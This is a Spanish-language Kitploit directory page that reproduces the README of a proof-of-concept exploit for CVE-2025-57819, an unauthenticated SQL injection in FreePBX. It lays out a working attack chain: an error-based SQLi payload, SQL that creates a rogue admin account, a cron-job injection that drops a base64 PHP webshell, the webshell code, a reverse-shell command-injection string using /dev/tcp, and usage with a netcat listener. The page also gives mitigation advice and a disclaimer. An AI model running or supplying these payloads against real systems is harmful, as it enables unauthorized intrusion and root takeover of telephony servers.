Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FreePBX-SQLi-RCE — Prueba de concepto de exploit para CVE-2025-57819, una inyección SQL no autenticada en FreePBX que encadena la creación de una cuenta de administrador, el despliegue de un webshell y la escalada a root hasta RCE. | Kitploit
Herramientas/GitHubGitHub/thescriptkiddoz/freepbx-sqli-rce
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónPapers e Investigación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Herramienta de Acceso Remoto
Desarrollo de Payloads
GitHubthescriptkiddoz/freepbx-sqli-rce

FreePBX-SQLi-RCE

Prueba de concepto de exploit para CVE-2025-57819, una inyección SQL no autenticada en FreePBX que encadena la creación de una cuenta de administrador, el despliegue de un webshell y la escalada a root hasta RCE.

Ver Repositorio
hace 3 mesesAún no revisado

FreePBX CVE-2025-57819 - SQLi no autenticada a RCE PoC

Python License

Solo para investigación educativa y de seguridad - Ver aviso legal a continuación

Prueba de concepto de explotación para CVE-2025-57819, una vulnerabilidad crítica de inyección SQL no autenticada en FreePBX que permite la ejecución remota de código. Esta PoC se publica después de que se lanzaran los parches oficiales únicamente con fines de investigación de seguridad y pruebas autorizadas.

Descripción general

Las versiones de FreePBX 15.x, 16.x y 17.x (inferiores a las versiones parcheadas) son vulnerables a una inyección SQL no autenticada en el manejador AJAX del módulo endpoint. Esta cadena de vulnerabilidades permite:

  1. Crear cuentas administrativas mediante inyección SQL
  2. Desplegar webshells a través de la inyección autenticada de tareas cron
  3. Escalar a root (si incron está disponible) mediante la cadena de hooks de sysadmin_manager
  4. Compromiso total del sistema con acceso a reverse shell

Detalles de la vulnerabilidad

CVE IDCVE-2025-57819
TipoInyección SQL no autenticada (basada en errores)
CVSS9.8 / 10.0 (Crítica)
AfectadosFreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
Parcheados15.0.66, 16.0.89, 17.0.3+
CISA KEVSí (29 de agosto de 2025)

Endpoint vulnerable

GET /admin/ajax.php?brand=<PAYLOAD>

El parámetro brand en el manejador AJAX del módulo endpoint acepta entrada del usuario sin validación, lo que provoca una inyección SQL basada en errores.


Cadena de explotación

Etapa 1: Inyección SQL y creación de cuenta de administrador

Verificar la SQLi usando la extracción basada en errores con EXTRACTVALUE() para filtrar el nombre de la base de datos:

x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

Insertar un nuevo usuario administrativo en asterisk.ampusers:

INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

Etapa 2: Inyección autenticada de tareas cron

Con credenciales de administrador válidas, el exploit se autentica en FreePBX y establece una sesión autenticada. Las cookies de sesión se guardan y se utilizan para todas las solicitudes autenticadas posteriores.

Inyectar un comando de webshell en asterisk.cron_jobs:

INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

El ejecutor de cron de FreePBX ejecuta el comando como el usuario asterisk, depositando la webshell PHP.

Etapa 3: Activación de la webshell

La webshell PHP se despliega en /var/www/html/shell.php:

<?php system($_GET['cmd']); ?>

El exploit sondea la webshell hasta su activación, logrando RCE como el usuario asterisk (uid=999).

Etapa 4: Escalada de privilegios (condicional)

Si incron está configurado en el objetivo:

  1. Crear un archivo trigger en /var/spool/asterisk/incron/
  2. incrond (ejecutándose como root) detecta la creación del archivo
  3. Invoca /usr/bin/sysadmin_manager con el nombre del archivo trigger
  4. sysadmin_manager valida la firma GPG y lo despacha al hook fwconsole-commands
  5. El hook decodifica el payload y ejecuta: /usr/sbin/fwconsole <COMMAND>
  6. Inyección de comandos: help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

Resultado: shell de root en el listener inverso (si incron está disponible).


Qué explota

  • Ausencia de validación de entrada en el parámetro brand
  • La ejecución de consultas apiladas permite la manipulación de la base de datos
  • La tabla asterisk.cron_jobs con permisos de escritura ejecuta comandos como asterisk
  • Persistencia de sesión autenticada mediante cookies de la cuenta de administrador creada
  • Monitorización del sistema de archivos con incron ejecutándose como root
  • Ejecución no validada del hook fwconsole con inyección de comandos

Instalación

git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

Uso

# Setup Netcat Listener
nc -lvnp <Listener Port>

# Run The Exploit
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

PoC

PoC Screenshot


Versiones afectadas

VersiónEstado
15.0.0 - 15.0.65Vulnerable
15.0.66+Parcheada
16.0.0 - 16.0.88Vulnerable
16.0.89+Parcheada
17.0.0 - 17.0.2Vulnerable
17.0.3+Parcheada

Mitigación

Inmediata:

  • Restringir el acceso a /admin/ajax.php desde redes no confiables
  • Deshabilitar incron si no es necesario: systemctl disable incrond

Permanente: Actualizar a las versiones parcheadas: 15.0.66+, 16.0.89+ o 17.0.3+


Referencias

  • CVE-2025-57819
  • CISA KEV Catalog
  • FreePBX Security Advisory

Aviso legal

⚠️ DESCARGO DE RESPONSABILIDAD

Esta prueba de concepto se proporciona ÚNICAMENTE CON FINES DE PRUEBAS DE SEGURIDAD AUTORIZADAS Y EDUCATIVOS. El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.

DEBE CUMPLIR CON:

  • La Ley de Fraude y Abuso Informático (CFAA) y leyes equivalentes en su jurisdicción
  • Probar únicamente sistemas que posea o para los que tenga autorización escrita explícita
  • Obtener permiso por escrito antes de cualquier prueba de seguridad
  • Prácticas de divulgación responsable
  • Regulaciones de privacidad y protección de datos (GDPR, CCPA, etc.)

USOS PROHIBIDOS:

  • Acceso no autorizado a sistemas informáticos
  • Pruebas de penetración sin consentimiento por escrito
  • Interrupción de servicios o robo de datos
  • Cualquier actividad maliciosa o ilegal

EXENCIÓN DE RESPONSABILIDAD: El autor no es responsable de:

  • Acceso no autorizado o cargos penales
  • Daños a sistemas o pérdida de datos
  • Consecuencias legales del mal uso
  • Violaciones de las leyes de fraude informático

Esta vulnerabilidad es:

  • Divulgada públicamente (CVE-2025-57819)
  • Parches disponibles públicamente
  • Publicada solo para investigación de seguridad
  • Compartida de forma responsable tras el lanzamiento del parche

Autor

JazzTheRabbit

  • GitHub: @JazzTheRabbit
  • HackTheBox: @JazzTheRabbit
  • YouTube: JazzTheRabbit

Licencia

MIT License

Descargar herramienta